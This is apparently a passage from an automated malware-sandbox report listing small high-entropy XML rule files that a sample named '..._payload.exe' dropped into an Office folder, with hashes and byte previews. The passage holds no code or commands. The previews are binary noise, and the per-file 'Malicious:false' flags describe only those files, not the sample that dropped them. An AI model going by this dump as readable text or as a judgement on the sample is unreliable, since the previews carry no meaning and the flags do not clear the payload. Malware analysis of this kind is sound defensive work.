                                                                                                                                                                      SSDEEP:48:CA1R6IvoK4nA/ZxF+y3P6rRbgTGOGRg2CuL6ewPD:zb2n4f+y/YRbgT462f63
                                                                                                                                                                      MD5:3ABBD4377C04D43ACAB7B5EEFC6D734B
                                                                                                                                                                      SHA1:697DC334B0241615FC140C7D6E6C7A102101B164
                                                                                                                                                                      SHA-256:4388693F76F997A7F6E3036B7A1C2B629696EB3EF2FB6EDCE14C173F1D58E66A
                                                                                                                                                                      SHA-512:9C6651A88955C698F930F6385841C3202370D8244CDA9B3BD9CBD18FBA09A22CD6B57F1096939810BF37C00CCEABCEBF887426784D5424E45A1D98961C38B62A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...t.r.,..NB3..K.K4....cU`.5E..9..z.......ZM..o..eg.l.1OsDm...*.v.0 .)......e3X..cw...o..h..(............Kv...{o.vu.........?....F.Qq.]...$.X.....8.Q..".4Z.!....!..\.l.o.2.Z...e........d...!.D,".Yn.....h.!.R.g.w.%...z...M.9".P...o~]..<gl.{...F.;.f.5V......a4r....R.l.g.....y.,..Z..v}.@;.......:.+..`.....~.K..#n.h?q.$.Cc...H.B.`.^.'.&....y..Y..%.?.+8r.&..n..>.5..l..\I.....[:...GlpE..Ih.$...]W..&f........Q...&'.[..F.}..:....w...d.Fw....f.1W.%....yB........{..R.P..`Z.F\./O......$:A...9.aD#.J...s..I...sM.&....Td]...U....."...V/.O..`..f...lP.w...d.'d)..pN..^.etR....k.FL...T*.=..8..o[.j...'..a...fhQ.:[r?....X.*...*....x......bc(.*..]"...Ox75..5..j.x.*..E.C.Oy.a.7..Z.RpT.gZe.w.D...G}! x.........T..........2i8.V=..(....H|p...u_.*.>}E......6....Oh...0...k..-JO..|.n.9(.mC}.wnF.../.......l.]..p.R....u ....%..+C... ....t9.....=.N.....gw.z.=....gi.E..'...."n..z...C.9T..H..m.Y.....r.V..q..-.....A9.D./.=../.z.f....5..}'"J......H.........o... ...=..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                      Entropy (8bit):7.874942429799792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zoBNEy2krShVt12t8SyJIjlrKD5pala2TpEI7371KHWLMcHc3wD:z9y2Xa8BIjlr0TalPzj7msB
                                                                                                                                                                      MD5:9C14E9C1337A2DA22B949E07CE38865B
                                                                                                                                                                      SHA1:D251EA449739CC80CA088D6C1CF7A4948F20C482
                                                                                                                                                                      SHA-256:2533EEE2C1E5E1B665E2F674FE559FB4089F5E505B3817AA7670CFD1BEF60103
                                                                                                                                                                      SHA-512:E0CC9943B2DB4B4D9143C1964288DB824E880DA0A498E43BF4F5FDF67E7417D0DAA92729A4643DEC3E07232E4FFE2F7A69A65FC93444B488AA78D25450289B71
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..WR.8-c.!...kM..k....P.t...!2cr......!6..B. q.....:,.5o.|..hz..K...N..6.. V.$X.E...e.4...X...G....m,...h.....p.V..6\.%...Q.c..-N,...I.gj'!.U.PjH.Of.$vJ.H..g..K..T.r,...m....=s9.....D.........6(..#O..t.HkiN.=x........|.v. E....v+....F..-...X."..f3.._.....).f.pM#.C9.@....;..h\..."B.....k....@E.Qx...l..fM.=..~T.V.7..bU?9.N..{.)*..<...'..W.8....B..ms.......z.k..@L[..y.q.....9"|i..Z.._.J.v... N..KPl+..8..O.=`.a...b.L....j.r.7.hh.3...{....~.x.a.U.....[q.w.E[.T......{......j6g......r.-(....$A.L...2v..o......C3d.U.c....f@...>.....j..I.;."N.7...%A%[...9F]..Q.Y{yl..P....s/i......oF.;xmh.k.:.cT.B.[.jZ.Dn.....F.....S.......k.>.......;....t..].1..`.QK...Qm.K..g..q.C.r.#'....Bs.{...6...bb....s>ye1..v#z..10.....z.9.. tfOfO.GY....v/..5.......t$i....L.J..%R.7.R......;.....@..=..\..N?..0...(.......@j.&.`..f..Q@.......R7._...P.......<=........Oe..T.2.ca..9.4..oQ$}....N%&BS)3...m.....4...J..b..N..+..@..@...W. .JQ.j`..h)....5V..X..C.2Tt...w_"a....lD.x.......,.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.904831220338433
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:qP4Qe0Fqg9r6qBp+fsZCcn6xorfKypzGso2TwNOwD:qq0v9+ZfJcn6QykzGF28N/
                                                                                                                                                                      MD5:4E15AB063BCE385801F6A11A5CD776B7
                                                                                                                                                                      SHA1:7EECE3FD2B67A5ACFD54EE1548C1116321460E15
                                                                                                                                                                      SHA-256:2AFCD4B13D9345D47740569683388D106322D888FBF2A84336A61462315E17FA
                                                                                                                                                                      SHA-512:F8B143DD226C5414D8E20AE7B7C284485BA49F66CF3C0B525428C340A655D0511633D1C4C1606B87FBB37A2A3FC9E1E8C621453A4AB918E6995F5A6FD2339E92
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlv`n......&R..gD...]Q':...OD.XWY....HJt....GUv..h#..N........).m...W.y.m...M...'.;..Oiap1@.S..U......$....w.d!.......[[\..N....#.I{.l$........&.-uTM(....CY.....z.=.U...?.!$...`........b#...{2.....K...AA.[....LZ.:N..q...1.P..4..S..f...fpa.T.)$....../P.^...l]...D.$t.8...HC...z.Rb0%....F4C....{..|.,.\.5...4.....,]....(.Q..F.}.q...2N.cK..).....v#.[._..O...d.{X.......8=..^.PAa Yo..6i...v......b..v..d".B........M...2....Z...........eD...a.H:=.&z;..$m..|1.kZ.K!.(......)Pd....c.....l_H....1E...3...q......%..u..../..QQ..K..%#..|..bU.1...<..:.=qT...|..D:`........0.%.I... 7]/.J.......Zo(V..\...z.......N..$..sX..x5...S.-\..xE...._.I\s..P..ZL?.!.I`....Z....of..e7..$i.".J....R.........s=mS.}.L...Bp........v..+l.B/..a.$pu..=K....L7.....oIi.O..J>W..2N.}...N...[.!...;....7.....uG...*..J...K.^..(.._...s...m'k.I....i..>X.*7.s..S.&..Y..z... O.&.Gt)......d..j...}.tzV.$.6.>..._.(...........{..;......#v...MS.y(....0......F.F..^.A.B....]b.(xx.d..*.[......4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.870238157156949
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:w1VjSZBHxQ4zFGalgVqc4yB6f9FrvK90tRExv5Je8YqD:mS7HxfzFGaA1sf9FWKExTd
                                                                                                                                                                      MD5:8433B45618A712ACC57B35787FCDF932
                                                                                                                                                                      SHA1:760B36014FBF50BA5E13E3D161F9A7FB69BFACA4
                                                                                                                                                                      SHA-256:A2814701C585E62C8B4EAE7FA4E8B04CE9431C7B07DA91A86E617B31F90B7630
                                                                                                                                                                      SHA-512:300DAC4C0A633C8AA4B9E52D08092DE1FAA63DF10408EB47F8FE0F278D483118255FCD61B3E07B98F9211D3AED4A6819D0D5C63BA5979AC70BF14348BD1A6258
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlx_.\Y.....[..}.bl&.F]...m..0.G.v.:..86.....~..DmaZ..r.{\|T0J..H.....b(.....~QJ.....812',...J..-MF.Cn;.}:.'.f`L..CS.]u........8z..3Tp+G.=U.l.S.7.....D.....Lz.8.x.U...J.;..`<a...2.K...~O..b.R.....`..X.F.c*.;..,.........H.|.......f'..B!.....hN$.j...6.[.e.4.tpH./...K&.zC:.zXm.OOi;...c..C...C...(....."f...`.*.:...v~....j...|.l.D.C.}.M.}........o.B..mJ..D....U!M........q..j........W#...{../X#..T.`..gs....Lx..lQ3)"....eXWS`....`.p.. ...o..Cd.oQ`f..4....s.|.XYx...,.o...T.t..c..~T......Y......g..S...'C9.;..f.p.0.......`.Z.I.*.k.d....s......V...<.....?.>&^.!#...|...1...y...@[.3v.AB..Q*.iJ-...Nh..0PvZ..~..H.!v[@...J.jTT...;.S.h..mW".5.......C.*.M.%e..y.<..Tm..m..: f.&..v.uf]^.F......fPL.*#.h`.r...??....W...b2.jNDe<xHwD..^......../J...d...."nP ..Wt...2._..k..."`.&WZ;.j'.0....J..(?Z....bIS...z.3.....4_S..L..n@Zx..he.K..k..O.aBy....&J...'.=...4....!....1N`+......x.=k{.6v|..*.!_f...0['...3.7G..'%......,R..eo...o...."?.....iWe...e.r.T2...v..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.8936475252210165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:KIiRpxvPzmH1V139K3lKzDO3gGIsUj2bc7spD:ViRpxvP+tK34DOCsUjxQB
                                                                                                                                                                      MD5:4956E898CC14398A0B83135C4F77585D
                                                                                                                                                                      SHA1:05285EF790823896F17E2F61EA884ED0C78FD757
                                                                                                                                                                      SHA-256:2D5E43E1D23E5CBB3D31990E0109DBA00E4ABC2EA8995CC6E9BF3FD1A82ECC83
                                                                                                                                                                      SHA-512:06CC4CCFCAAB9F7E8158C3C6839E8BC588CD4979D9E38932ECEF9FE0847BFE97A736089D2402002658EC7AAE73180A08CB4A29781AC98A004B49FF79B2DD929C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml[..E...s.e...8.q.1_............X.pN..=...+#.N..t..k..D...I...Gz?.C..<$....C.VQ.....Xg.#nE;R..,.Q...|.J..........3..y..M........L..A..2.]..?....tD..o..K..#..a...~..i...?9-U4L#....+.~.4.wp./.r]....P2..?.G..._.h.Xry....P..).A.l.....\1~.b.!M..6.?....cFf.........m...x......T.yot.*.f..........j....Z......u..'.4.17\.!..p.Jz.t..;......{.T<zC..=. ...j@...Bxj.7.K...H).....#..E..v.......T.9.5......%.....Z'e.../....`.J.U........Tf.l..j...]..S.},Z.....^..1TC.....[x....+.....o...]Gb.... ..U..tnB..~.g..a.[....C7.].wG...-.......{..x..g........U>.*..D.i..K..;.T.....Gu..<..a.).M>:.He1E.......W0......(....|.H...|....;}...b.).....E...zj.m#.4....$!;.R.6-h.T..a.V..!.j ....Y................=..BMp.......s....t...P3z...Z.n+ee..BX......Y]J?^../......uX......,.....c..B...~.d.S..vl.3.].......o.[8......Yj....(..].z/.h....h..4.<.`F....[.P.4......t.|=!.^.CR.;.. .s.......-..6.$..F5.5.......3....j...U...~._Qc..>.|.9.t=....k[n.a.?...x.r. .d.%.....BXI.u..(...&..X

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.888138040070914
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:GP/Rlo5mmzbgrYzeoHR0NdEEG6ihPud27AnoX2D:kRMmm/gMzeomdGHhPtA4u
                                                                                                                                                                      MD5:264D9F44A8FCFB995DF13C339C73A158
                                                                                                                                                                      SHA1:811B4A84DB7033E415960F8FF2DA38507009A71E
                                                                                                                                                                      SHA-256:F3D3B3FFAE72DEB773100D0429FAE0184C129E4A5624D06A53A4F0C7D9C811F8
                                                                                                                                                                      SHA-512:CC394C7BABFEBCBF2E6A84798FBE071219DF51B5346BE35683E96EA831C826C375BA35A9D679B4A67B426586FA64B0CEF43FF1CE4F430B062737A59DF30F1B16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......._@..N.,.. .:MM..g.\.O..Hd........E..Pk..d.B*.\.@3.hmcT.t.u....u...`;.....lb.T..22.Z:..p...?I....&....=....Wq....Ty.A..5S.~......?..xU.djh#J...U!..k(..........a.Q7...>....l.Qog6...o....LOn..}. ....#.....7.....ijJ........p?...@.x.....c...,|...Y.*7vj}Z..8..Q5.*. .....na.d...M1.......7..s......$...v.z.S.Y.}...*1i.0........x.3qs. .9Z...^.......8W^..M..F......(}l[....v)w....&.6...-.\.*m....e~....|&f....(..6Q..1..I`..>....%0d...CT..t.m4..<.D...O>....!....="...UD.c..v...2r`.y.k..N..........M.D.W.T.V....1m.K....L.V.......H.......k..kR.x........C..K..5..m..9..nv...\....{....I..I>...-vy.u..}.-....\.......R...q..v^.....ER.......(.I....>....<.E\....sm t4...!:h!..?>Q.P..`.......d..e..3.C..YKd....Y*...>t.0.K.y..?T.,.v...?.{........}.R...v..b..z`\......{.G.tV.~=...C.......`................jD.....S....[..^`..-.H.C.!S...ib..[.......A..Z....7..i`m...-.CO..y`D.3i._.HX.......H..k.aOE..f/!.Xb..~S7....H.rCQ,.O.C...[...".C..+

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701301v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.893726362530195
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:alnBPeP+8SjMcKqdPg70jFlIekKaalZlfID:q5W+tMcKqdPg7aIe3awZlfU
                                                                                                                                                                      MD5:5E820928F23FE4268D1070B637733DC7
                                                                                                                                                                      SHA1:DDE85C0D54E82E9EEE013057F6E167518CFFAD3E
                                                                                                                                                                      SHA-256:5A1F4DD1E217900657A86BA49B43B87AF9B152606D041C889D65306E481B006A
                                                                                                                                                                      SHA-512:4C3A881425D64633A6BA5E53CEDD10AC4C774B78D0F935924DED7BEB197CE2B6849DAAFA3A9447131A1E002AD7B4079FAB63BE0E6105A8CA76BBD125A492FA32
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlH.....sZ..z.R>`'.v...S.IAF....zR....2.gX.....Z..l...L. ...d...Y.F.V.......\.Jx...sEt.}$ [...{.S.y.....3....Z]...n1..'c.v..6 ..dH..]..X]p......E.d...ko5...E.m....J.9.,M.S.5......zH`.e......Q;....n...M...<..K....|=C...d.,#.KQ. |..I6.u1.qS.th.g.6..`...(z...u>.e.'".....d........,.X4._.'.&.|O@.....~.:.....X.?e.>{....d.}..:.6.....;......i.......G.-p..].I....h*...K k.&.If*Z.j.c..-....[...Q].w+.]i.$2..i.v..@..mU..m....3.BmX...~..9X99c........z..V$-..7`+.....;..@.>..C.CK....0X.#}......Vsh@?............FwV....Qz..m.....|....R.I%..{..Nw.xH....M.....`.k...!.~e....in....x...:..| ..D..).L..q.......t.(..O..8...n..v..n...J.n.....bya..VR.........N.n..Y.Y(8U....7[C.'./..d@...H.{.R......J..{4{..U.7i..P.......|...nn.!.d.0.{.#.....;,........Eo..$..}..YF1..Gyl..5..B..,Z.+.+{.2...PgT.zX.&.3e....c.};.J1.S<.n.2.w.t@.R.Z..J.5...c.@....0Y.s y....B.@|..kTcR~t.b.....y..YUJ....y.....(.....|:.k(...m...kI.k.t.V..i........v.Z.k&..F.,..<C.elv.q.@z..,....k|.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701350v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1703
                                                                                                                                                                      Entropy (8bit):7.880003209428638
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cIrxJGGT197hlBUFqeZ6GMP1jPXhiVGYBD:mGT195U0eZgPaVH
                                                                                                                                                                      MD5:653525F0295E73B9C8503F421B40F5E9
                                                                                                                                                                      SHA1:80BD3224A9BFBBE86B94B6FBBDF82A6B19DB022D
                                                                                                                                                                      SHA-256:16183CA80413B2DD3F2BABD948A87D134C49FCC5DF61866C2614E94CFC09E97D
                                                                                                                                                                      SHA-512:C7450A6153E00669AF073C87A4CFB68DDC8DD6E1A916022F7AB23EFB048A9E88F64F1C2279DB4F94226639A8CC24607C7C5FB22FD130FD5B1E58E4DA3E3A30FF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.?v....b4.~..Uc..).....!OB:..+J......F...x._.z/<.\L94$@i_....D..G...A......?.5).%P#..q.p.>C...&Uee..-........m\.V...~......?.?*#'..i_A.F.x.....P...#.f.+|9.:......".......E..>Z..:...L._Xc.m.A.....:....W]Q...F.t..9d.Z>W.......HF5w.....G..1D..~-..5.,..N].!......f.N..P&.c....?..`.xDA2p^.D.XP...DJ...*R{..A..B...s.S{....@y...{..A...L..@.{h..L!:.:o..Hu.L....F.Y.W..5.....Dg.1>......O.7.i.z...n..6+.(Q...~u..Q.....}?f.C.B............fD.....g.f..Y......xZ.e..A .j...e.s......x.8l.50.IO....#.m...Qh.t2....Z.".'..../..+a..a%.|7\..h... .x..B.....\.D....>.B <P.9.$....=.....B..V...K.)..f...d..j.......9....p\..{.>..5.^.......V(2.n.6+.}.+.t.0.....4R*_9Y.Yq....:.sk......h.x.......e..N.y.WB>$..Ku"O.n.SVn..+.......|!z.#.f..&.dapP..../3...d2T?}0.\..>w.Y..9;.B.Ey.I..k...!.....Bp"5......4.M.../.o6.X.....t.G.......!...L.)AT.cL..}Y.......h..C`..."_.....0.>.....[....T*N.....n^o/..j......@}...P...]=..aA<.,..1...S...^.a..FQ.T...>.L..c.K..Z....<...he.pN.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701351v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.898857535303376
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:D+5uJW4uiTVIoarFuNd+DiaWBflR75j9TD:KcJW4uSqgd+DcBflRF5
                                                                                                                                                                      MD5:374F3F29A551637E593F8B6398261191
                                                                                                                                                                      SHA1:2BFAD068789DAEFE9C5716D980023F5C86596BBB
                                                                                                                                                                      SHA-256:6B9C613C351F09E80BD193AEAB55A1982AD6C16529B9C014DC965B814012F8ED
                                                                                                                                                                      SHA-512:70C2602EE2EFEFE8F7D0E4151329EE6D6C8A4C3C26757A28B0C21ACE73FE3ECC76A3B61921E8AC83EBC30F926C85CDB802A5EB1BC73FC1549E7F5E09BCC4CF5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.@....>.N.8hYE.<.g...G....2...;...6 .R.}.g.em.b.YS:....{.|.y..t..g...{....Q...85vs8.\K..UQ.l.......Q.q.n.....p.....n.j@..Y..s.@.6>.K....f%.S|.a..w.....`.E...2JDK.((\XF.Qj../...[..gCUi..<.d...pHvq..B..P.....)H.CM.$..df..dg ~...?`..iW...z. .....k.P......x@.D6.l.."T\.*.....}8.M..4.#..O...c.X.j...U.4.;....aM#..k9$..#....a...r....g.u.F!i|=i..t.f....s..&.0.&.....J.N.....*p.`.(Ezr..N.O.a..`..cR.m......&...7.......7...Lo...:.....LT..w?.......&...t\%.'e.eVp3.N.W..#.;..... ....h...%.qx...~.NN.."u.....p.~@$C.+Rh..........I...6...?.y...*MS.8...duE7t.r.7..P.C..ki%.g|d.WIS..i..+......Y...[...X.............E,.y3...;.....|...}Q...6e..v..E.[.~&_.|mK0.tr.!3..v..id.d&&......s..^w!...h. 5L6...&...A.58.36.N......D#. ....0!"......]...|....._..........m..>5.vh5..O.a....Z..=..."}..U.....98E ;f.L..T..lE.8.gj...@...J..O..Wbm.....c..11b.2.....I-..L|o../.P...ni..F-.X%.......`b_..[..:..f...Vf&..V...R.....S..H.<.>..Tb.p......!.~.8..'L.._....<.]k.E.\.$....<.xk

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701400v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.898448043625405
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gTmv4EYfwlcpT2BpfI4K7pSGCyQ8u4FadRh+pXHW+wz82bD:gThElVc2yQ8bAdKpyzPD
                                                                                                                                                                      MD5:C5666CCC2B20A88AA19722180DF94FD9
                                                                                                                                                                      SHA1:AE35B4A240E8D33A7D092CEEB2D1E55E36F5C222
                                                                                                                                                                      SHA-256:DBE646645A7A08E7C4EACCD50E706BD3300304D92CC014574989348C63CFC4F2
                                                                                                                                                                      SHA-512:65177DA0671E93FFF0EC658C144A0CB0C797038BE76C1968332F561D25947B7B0DA379C4B01B6C4CE1B1582A928F73ACD028803177A339FA09CB40A1C61D10F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlgN7.>...:+....%....3...U.C^.J..oR4...\.....^..G..]%...t.g....@l4.."...v.C..1.?...W2-Ct>..w....q...t(R..Y.Y>.......h$u..I..E.^.P....U.j\.._uv$u.yjmQ7.{.kd.a....%....e.t.d.D3.5..>B`.....8t....|$.W.V..........E....x.E.....tL.#.....]..H,v.... ..V.J.p....L.`..KzFV.....B...q....k....Y:.H..o....[...E.n2..%.....r..@xV 6.u.*.5.a)[.MB..<L+/.4.<z2.D;..I...........7.P3.......).s/..o......W..>.!]...v...go....`.......~.........?...Zu..Lc.....'yD-JD..H..`..Yk3M;,...(.W.A.7......oLMa..q...G...I..../.A....s5|.'.~...+.2..?'.Cr..z......h..E.gp.......$?V..0.}..|iY/..Sn;s".l.B.|.VG.Nu^....W.. @'./.O..{..a.>..._.Wdh.'YunQ..Ft..'..w.g]C.'...._.-.....5D.*.)..v>a...K...I......F....TM.....l.v."..'.6..<.c,@.F_...%i/.C>3.j.3.n.m.X.yr.B ...k.{......&..=..X..\...........4.;....?..{JB.c...M.,q......e.9..".].6.Q.-...[;.j....^.\..9UP.x...L9'. I/.^....3..4..8......9e.N.^V'.seQ....V..tRX<..Z`4.S...s..b.+..)..NP...q..x...X.67A.y.G...8.....HB...8p..E.4?..2.3..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701401v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.904289298552406
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/Ef0UPjOd9gUTKcrMTrl08XpOKKX+YYC57KGaKD:sfZy4UkR0YEdOu
                                                                                                                                                                      MD5:96F059FF4AC0D5F11C098D518A2CB2E3
                                                                                                                                                                      SHA1:4AD9B41DAA7270C0FE04E47CBD15BE900410BE1A
                                                                                                                                                                      SHA-256:04528C97A37F373F9D95AF118C6AA10296DD48C642142D2B526998EC71C935DE
                                                                                                                                                                      SHA-512:38996E86363F4837D8595EEFC407228D7440154D7A3EEEB1B767330D20D7B867A22F30DEBF8B9CA586EF49D271FAFFD49619F7DF86CA02F4715BAB4AC55E5BF2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.{...*"...y.,...U..j.._7T...fc.qA..........D.ulzz.eu........>.....1...&.....h..z!...<..O4...m.4....+.QR...5AI.p.}..Z..Z.......$."9....C.f\m.I.,..I.#...O.....v@...V!.8.Q_.j..Y.r. .P)h.:F.6.%.d.af.E.."..\,Y.!B.#..u*..&...4.3..U...no".a....84....X(.&i..a.."C.....|9.]..9>!....<...y...G.]$;..D.#{..... u..z#...N/...@.........V+.......N.| .J.........g.6..F...i)"y.v.....H...+*..Wn\W.k)..j.1*..<@-..{K.p..,.0..A...-0..............Za...j....~.V`^.G...X.b.;y~jL>.c@{D/25.Z)...a......5|.4x..q4....|.M....H........l.><"9B)..l..7........I...f..#.s...?.7..G.Wp....tFR.m..2)iz.h...S.2.)....r(..(.5......9.r6...h.y.%...|J........f.[...RL.Kg.Y!.6`.1.....#...P.3..X..b.B....U.gj...Cb......<R._..^..=...G..)M...I.$..f.BY.C..c.-..'&...7U...B..t.hh..lm"M.`.w..@.t!..Y7..u..l..Gq!.GI...1k|...|..j.Cs<.-%..N@.=....._..f..W.c..a.l.....}D.%....`s.bDP...(VR.Q......\itW.j....x5.o`...T!.....{..l:?.;.`..Ic..Q!.i...f-...:.W...@.K.D.a..{......N..i!"(...(!9.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701500v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.882504717932356
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Qjp95pHTrxE5UKRx0R6cjBeQoC/XzUavQgpVrD:Qd95pHh/R6cjBejGoaoMVH
                                                                                                                                                                      MD5:F9E16BFC42522AD778EFDF83B227E8AA
                                                                                                                                                                      SHA1:D601BF05EA0EB86790C755401AAED600B0FDDC4D
                                                                                                                                                                      SHA-256:28E852F7A849FE68B77829EA53DB58E178031FC6D3CACAEFDB656A29378D2867
                                                                                                                                                                      SHA-512:67E757CBB0545D106A9663DFD9AAE81A3960B6106DB22F1ACE0B98ED30AADCE939921AAC851D481FF97B03090BB78A1EEEDF054AC78B2D04344B7956DF68D71B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlm5L..r/..........=[..$...^[.."......>."....=+V7k:........q'}B.........l...xWg......=...:.c...N.........!Av.^nS7.x.A....l....j...=....c.@..}.~...,)+1........Lq..l5.P}D.........]A...i..9..wx.PV.s..(...W.)~f....Q..Y..i......7zh0.C"KDN...i....,./..q..x.-D`.e0......A.J.e....._.`F.<.?...mF.m....9*.........]....F.ZK.X..J.k.!<}i..+....f....vj*.WC..l..W.'...q........(..3..f..;+,%.X.?=K...'%.[m..L.k.....M.E].v)..0.&.}.qX. .ep^:.`.....Nc...=%,.<F\TB.s.weO3.R.....W.7&...q..)...1...<.u7.... .:......V..\.&$.(.].1....c...f.X.;.ay.'.b....uC.S...T...B=..L.,.|&.?...A......x6.Z..t7.\m...........h.Q..`..E.M.Y)iS/B|#.f..2...z#Y.xg\..X.@..S.q9P^q.^MF..\.-R..<...!:'..YE..mH.......}E.D...].fE3...~......5w.....R.."EwC.nJ.TM..I.q.....vp.....'K~...th%d*.....^.i.l.m.._-^.X...Ylg.Jr...Ii..........S?...d.h.D..w.p2..d8....H]b7sa&v........S>.c.j.....p.U'Ed%.8fV..?WX:.&a.i.H7....8.o.<.Y..y.....@..S...l...V......#j`....,..C...h....F.W'og.....U8.._...w..!>.........x".O_....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701501v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.911599540832381
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:T0G4rz1Bc7AzJ1vwM+8FftC8/3Z2VORE3+D:T0G4rz1K7AzJOMxJp3Z2VOR1
